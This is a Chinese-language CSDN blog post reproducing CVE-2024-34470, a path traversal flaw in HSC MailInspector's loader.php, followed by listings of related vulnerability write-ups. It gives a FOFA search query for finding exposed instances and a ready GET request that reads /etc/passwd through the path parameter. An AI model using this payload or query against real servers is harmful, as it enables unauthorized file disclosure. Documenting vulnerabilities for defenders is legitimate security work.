【漏洞复现】HSC Mailinspector loader.php 路径遍历漏洞(CVE-2024-34470)

于 2024-06-07 16:27:19 发布
阅读量258 收藏
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/139530160
版权
本文详细介绍了HSC MailInspector电子邮件检查工具中存在的一处路径遍历漏洞(CVE-2024-34470)。漏洞源于/public/loader.php文件,未认证用户可通过path参数读取服务器任意文件。文章涵盖了漏洞概述、复现步骤及影响范围。
摘要由CSDN通过智能技术生成

0x01 产品简介

HSC MailInspector是一款电子邮件检查工具,它能够扫描最新邮件,并允许用户远程执行各种操作,如浏览、垃圾邮件排除、编辑和删除。该工具还支持SSL安全机制、在线回信、新信通知、登入纪录和错误报告等功能。

0x02 漏洞概述

HSC MailInspector /public/loader.php文件中存在的路径遍历漏洞。未经身份验证的用户可以滥用/public/loader.php文件中存在的路径遍历漏洞。path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使攻击者能够读取服务器上的任意文件。

0x03 测绘语句

fofa: "mailinspector/public"

0x04 漏洞复现

payload:GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1

了解本专栏 订阅专栏 解锁全文 超级会员免费看
从不学安全
关注
专栏目录
订阅专栏
漏洞复现】telesquare tlr2005 getusernamepassword 信息泄露漏洞
qq_67810151的博客
03-11 405
Telesquare Tlr-2005Ksh存在信息泄露漏洞,未授权得攻击者可以通过该漏洞获取管理员账号密码,从而登录后台。
HSC Mailinspector loader.php 任意文件读取漏洞复现(CVE-2024-34470)
最新发布
0xSec
06-03 612
由于HSC Mailinspector /public/loader.php文件中存在的路径遍历漏洞,path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使未经身份验证的攻击者能够读取服务器上的任意文件,造成信息泄露,使系统处于极不安全的状态。
Goby 漏洞更新 |Telesquare TLR-2005Ksh 路由器 getUsernamePassword 信息泄露漏洞
m0_46699477的博客
05-12 298
Telesquare Tlr-2005Ksh是韩国Telesquare公司的一款 Sk 电讯 Lte 路由器。Telesquare TLR-2005Ksh存在安全漏洞,攻击者可通过未授权getUsernamePassword获取用户名密码等敏感信息。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 903
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
Telesquare TLR-2005Ksh 路由器 RCE漏洞复现
0xSec
11-27 1212
Telesquare TLR-2005Ksh存在安全漏洞,未经授权的攻击者可通过setSyncTimeHost执行任意命令获取服务器权限。
APM-HSC功能示例程序.zip
04-02
APM-HSC(High Speed Control)是高级过程管理与高速控制的缩写,通常用于复杂的自动化系统中,尤其是在工业自动化领域。此压缩包"APM-HSC功能示例程序.zip"包含了关于APM-HSC功能的示例程序,旨在帮助用户理解和...
HSC-1.github.io
03-10
月亮吉基尔主题 Sorry guys but there will be no update until I buy a new laptop. ######(如果您喜欢或使用此主题,请给 :star: 激励。) 是一个最小的单列jekyll主题。 特征 最少,您可以专注于自己的内容 ...
NX70高速计数器NX70-HSC1NX70-HSC2-RockwellAutomation.pdf
09-10
NX70高速计数器NX70-HSC1NX70-HSC2-RockwellAutomation.pdf
HSC-BT25A.rar
08-30
HSC-BT25A】是一款专门用于音频播放和传输的蓝牙芯片,适用于各种音频设备,如音响、耳机、车载音频系统等。这款芯片具备广泛的音频格式支持,包括无损音频格式如APE、FLAC以及常见的有损音频格式如MP3、WAV和WMA...
Node.js
ximingx
03-16 4059
Node.js 总结
CVE-2024-29269:Telesquare TLR-2005KSH路由器RCE漏洞复现 [附POC]
薛定谔嘚喵博客
04-11 314
Telesquare Tlr-2005Ksh是韩国Telesquare公司的Sk Telecom Lte路由器。Telesquare TLR-2005Ksh 1.0.0和1.1.4版本存在未经授权的远程命令执行漏洞。攻击者可以利用此漏洞在未经Cmd参数授权的情况下执行系统命令并获取服务器权限。
portal规范
kinglord
03-08 147
1、portal规范收藏: JSR 168 :jcp.org/aboutJava/communityprocess/final/jsr168/ JSR 286 :jcp.org/aboutJava/communityprocess/final/jsr286/   2、简介:   http://developers.sun.com/portalserver/reference/techa...
Portal技术介绍
stefshawn的专栏
08-19 1819
Portal是web应用发展的一个重要趋势,目前几乎所有大的软件厂商都有自己的Portal产品。并且Portal技术已经形成规范。本文对Portal技术和产品进行了分析,目的是为公司产品的规划提供参考。 1 Portal的概念 根据(JSR (Java Specifica
解析 gui-config.json出错,可能需要密码解密 的解决方式
热门推荐
一碗单炒饭的专栏
04-13 1万+
问题描述 启动程序时,弹出以下提示 此时需要点击右上角的关闭按钮或者输入解密密码再点击OK 解决方法 如果SS、SSR运行时出现以上提示,说明程序无法正常启动,需要自行解密程序目录下的gui-config.json文件。 此时该文件中的JSON数据无法被程序解析。 如下两种解决方式: 直接删除程序目录下的gui-config.json,不过用户之前所添加的节点信息会全部丢失。需要用户重新进行添...
解析配置文件config.json
qq_15167261的博客
07-03 2521
在课程4上 中有解析配置文件的相关讲解,可以在7月3号的版本上进行的,这个版本在百度云中有备份。
解析config.json
qq_15167261的博客
07-03 4316
在webappbuilder中,通过ConfigManager.js解析配置文件config.json,把config.json中所有的节点应用到不同的类里面
渗透测试-JSONP数据劫持漏洞
cdyunaq的博客
03-31 7679
​介绍 JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。 更通俗的说法:JSONP 就是利用<script>标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生..
修改JSON字符串中的敏感信息
yuan487639的博客
01-24 2807
项目要求把json字符串里面的敏感信息加密,比如手机号身份证之类,这就要求遍历json,并且覆盖所有的敏感key,原本以为挺难的,静下心来想了想,代码修修改改大约一个小时搞定了,其实是一个简单的递归,跟遍历一个目录并输出所有文件名一样,废话少说,直接贴代码和测试用例。 package com.ucredit.test; import com.alibaba.fastjson.JSON; i
CTFHub-JSON Web Token-敏感信息泄露
feng的博客
09-09 1345
前言 以前是没有接触过JWT的,直到几天前看了看DDCTF的Web签到题,发现是知识盲区,后来看了看WP,才知道好多东西自己都没有学过,因此特地学习学习。 关于JWT的基础知识,我觉得下面这个文章写的挺好的: JSON Web Token 入门教程 知道了JWT的基础知识,我们便开始做CTFHub中关于JWT的相关题目。 WP 首先打开环境发现是要登录的,我们直接burp抓包来看一看: 在response里发现了token。我们直接对token的header和payload进行base64url解码,解码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值